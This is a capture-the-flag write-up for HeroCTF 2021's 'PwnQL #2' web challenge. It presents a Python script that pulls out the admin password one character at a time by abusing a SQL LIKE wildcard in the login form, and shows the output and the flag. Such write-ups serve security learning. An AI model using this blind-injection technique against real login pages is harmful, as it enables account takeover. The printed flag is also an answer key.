HeroCTF v3 2021: PwnQL #2

PwnQL #2

Category: Web

chal

75 points

Extract the admin’s password from the database.

URL : http://chall1.heroctf.fr:8080 (same URL than before)

Format : Hero{}
Author : xanhacks

Solution

It’s continuation of PwnQL #1.

login

But this time the challenge is to get admin user password. I’ve prepared python script for this task (source below).

import requests
from string import digits, ascii_letters

flag = ''
characters = [i for i in digits + ascii_letters] + \
             ['\_', '!', '#', '@', '$', '}', '{', '|', '^', '&', '*', '(', ')', '-', '+', '=', '[', ']', '<', '>', '?',
              '`', ',', '.', 'END']

while flag == '' or i != 'END':
    for i in characters:
        flag_candidate = flag + i
        payload = {
            "username": 'admin',
            "password": flag_candidate + '%'
        }
        r = requests.post('http://chall1.heroctf.fr:8080/index.php', data=payload)
        if b'Hero{pwnQL_b4sic_0ne_129835}' in r.content:
            flag = flag + i
            print(flag)
            break

print('Flag: Hero{{{}}}'.format(flag.replace('\\', '')))

Output:

s
s3
s3c
s3cu
s3cur
s3cur3
s3cur3p
[email protected]
[email protected]
[email protected]
Flag: Hero{[email protected]}

Flag

Hero{[email protected]}

Privacy Policy
luc © 2021